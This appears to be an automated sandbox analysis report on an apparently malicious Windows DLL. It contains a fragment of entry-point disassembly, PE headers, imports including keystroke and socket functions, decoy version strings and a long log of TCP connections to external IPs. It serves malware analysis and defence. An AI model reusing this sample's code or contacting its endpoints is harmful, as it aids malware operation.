                                                                                                                                                                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                  call 00007F1DC8C50D7Bh
                                                                                                                                                                                                                                                                  push 0107E6F8h
                                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                  call 00007F1DC8C51D80h
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                  sub esp, 0Ch
                                                                                                                                                                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                  call 00007F1DC8C4EBF0h
                                                                                                                                                                                                                                                                  push 0107E62Ch
                                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                  call 00007F1DC8C51D63h
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  jmp 00007F1DC8C56CCDh
                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                                  and dword ptr [0108C450h], 00000000h
                                                                                                                                                                                                                                                                  sub esp, 24h
                                                                                                                                                                                                                                                                  or dword ptr [0108009Ch], 01h
                                                                                                                                                                                                                                                                  push 0000000Ah
                                                                                                                                                                                                                                                                  call 00007F1DC8C61BB6h
                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                  je 00007F1DC8C5171Fh
                                                                                                                                                                                                                                                                  and dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                                                                                  lea edi, dword ptr [ebp-24h]
                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                  cpuid
                                                                                                                                                                                                                                                                  mov esi, ebx
                                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                                  mov dword ptr [edi], eax
                                                                                                                                                                                                                                                                  mov dword ptr [edi+04h], esi
                                                                                                                                                                                                                                                                  mov dword ptr [edi+08h], ecx
                                                                                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                                                                                  mov dword ptr [edi+0Ch], edx
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-24h]
                                                                                                                                                                                                                                                                  mov edi, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                                                                  mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                                                                  xor edi, 6C65746Eh
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                                                                                                  xor eax, 49656E69h
                                                                                                                                                                                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-20h]
                                                                                                                                                                                                                                                                  xor eax, 756E6547h

                                                                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x7ee000x50.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7ee500x64.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x8d0000x3a8.rsrc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000x1764.reloc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x7dd7c0x54.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7ddd00x40.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x590000x1c0.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                  .text0x10000x578330x57a00False0.745444565799data6.55487974755IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .rdata0x590000x267d00x26800False0.488661728896data4.12469698281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .data0x800000xce600xc00False0.194661458333data2.60418051096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .rsrc0x8d0000x3a80x400False0.3935546875data3.03585890057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                  .reloc0x8e0000x17640x1800False0.802734375data6.62284157941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                                                  RT_VERSION0x8d0600x344dataEnglishUnited States

                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                  KERNEL32.dllCreateFileA, SetConsoleCP, SetEndOfFile, DecodePointer, HeapReAlloc, HeapSize, GetStringTypeW, CreateFileW, GetConsoleCP, WriteFile, FlushFileBuffers, SetStdHandle, GetProcessHeap, GetCommandLineA, LCMapStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, CreateSemaphoreA, GetLocalTime, GetSystemTimeAsFileTime, VirtualProtectEx, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ReadFile, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, CloseHandle, GetStdHandle, GetFileType, GetConsoleMode, ReadConsoleW, SetFilePointerEx, FindClose, WriteConsoleW
                                                                                                                                                                                                                                                                  USER32.dllGetMessagePos, SendMessageA, DefWindowProcA, GetClassInfoExA, CreateWindowExA, DestroyWindow, SetWindowPos, CheckRadioButton, CallNextHookEx, GetClassNameA, EnumWindows, FindWindowA, EnumChildWindows, GetWindowLongA, GetWindowTextA, ReleaseDC, GetDC, SetForegroundWindow, UpdateWindow, GetAsyncKeyState, IsClipboardFormatAvailable, SetClipboardData, SendDlgItemMessageA
                                                                                                                                                                                                                                                                  WS2_32.dllaccept, bind, closesocket, connect, socket, gethostbyaddr, WSAStartup, WSACleanup
                                                                                                                                                                                                                                                                  COMCTL32.dllImageList_DragMove, ImageList_DragEnter, ImageList_ReplaceIcon, ImageList_DragShowNolock

                                                                                                                                                                                                                                                                  Exports

                                                                                                                                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                                                                                                                                  DllRegisterServer10x10441b0

                                                                                                                                                                                                                                                                  Version Infos

                                                                                                                                                                                                                                                                  DescriptionData
                                                                                                                                                                                                                                                                  LegalCopyright Man electric Corporation. All rights reserved Secondreason
                                                                                                                                                                                                                                                                  InternalNameBox silver
                                                                                                                                                                                                                                                                  FileVersion4.4.6.846
                                                                                                                                                                                                                                                                  CompanyNameMan electric Corporation
                                                                                                                                                                                                                                                                  ProductNameMan electric Name
                                                                                                                                                                                                                                                                  ProductVersion4.4.6.846
                                                                                                                                                                                                                                                                  FileDescriptionMan electric Name
                                                                                                                                                                                                                                                                  OriginalFilenameRoad.dll
                                                                                                                                                                                                                                                                  Translation0x0409 0x04b0

                                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.514410019 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.515661955 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.557389021 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.557527065 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.558636904 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.561875105 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.561997890 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.563075066 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.603852987 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.605987072 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607000113 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607023001 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607100964 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607145071 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607918978 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.607940912 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.608019114 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.608062983 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.657485008 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.658337116 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.658601046 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.701085091 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.701116085 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.701149940 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.701164961 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.701268911 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.701306105 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.702135086 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.703269005 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.703381062 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.742679119 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.747849941 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.752954960 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.753545046 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.796333075 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.796416044 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.797455072 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.797472000 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.797559023 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.799201012 CEST49729443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.843962908 CEST44349729104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.941133976 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.941154957 CEST44349730104.20.184.68192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:15.941267014 CEST49730443192.168.2.6104.20.184.68
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.658579111 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.658811092 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.704301119 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.704505920 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.704771996 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.704859018 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.706150055 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.706214905 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.749958992 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.750957012 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751048088 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751137972 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751158953 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751177073 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751205921 CEST49744443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751209974 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751238108 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751270056 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751276016 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751302958 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751334906 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751351118 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751363993 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751373053 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751389980 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751396894 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751456022 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.751456022 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.752465010 CEST49745443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.766494036 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.767680883 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.767973900 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.770447969 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.771133900 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.798470020 CEST44349743151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.798563957 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.799264908 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.799494028 CEST44349744151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.799576998 CEST49744443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.800189018 CEST49744443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.800625086 CEST44349745151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.800702095 CEST49745443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.801219940 CEST49745443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.812220097 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.812273979 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.812351942 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.812381029 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.813316107 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.814181089 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815077066 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815098047 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815135002 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815218925 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815234900 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815287113 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815325975 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815340042 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815371990 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815387964 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815426111 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815437078 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.815480947 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.816416025 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.816432953 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.816548109 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.816797972 CEST4434974187.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.816843987 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.816871881 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.821469069 CEST49741443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.847110033 CEST44349743151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.847969055 CEST44349744151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.848351955 CEST44349745151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.849292040 CEST44349743151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.849318981 CEST44349743151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.849334955 CEST44349743151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.849396944 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.849426985 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850553989 CEST44349744151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850575924 CEST44349744151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850586891 CEST44349744151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850621939 CEST44349745151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850637913 CEST44349745151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850666046 CEST49744443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850737095 CEST49744443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850776911 CEST44349745151.101.1.44192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850811958 CEST49745443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.850832939 CEST49745443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.857002020 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.857036114 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.857054949 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.857072115 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.857124090 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.857199907 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860260963 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860281944 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860297918 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860317945 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860336065 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860379934 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860383034 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860409021 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860445023 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860507965 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860526085 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860567093 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860594988 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860616922 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860636950 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860665083 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860696077 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860778093 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860795021 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860814095 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860827923 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860867023 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860896111 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860938072 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860948086 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860987902 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.860992908 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.861037016 CEST49742443192.168.2.687.248.118.23
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.900753021 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.901585102 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.901741982 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.901869059 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.901983976 CEST49743443192.168.2.6151.101.1.44
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.901987076 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.902013063 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.902029037 CEST4434974287.248.118.23192.168.2.6
                                                                                                                                                                                                                                                                  Jun 3, 2021 17:48:29.902061939 CEST4434974287.248.118.23192.168.2.6
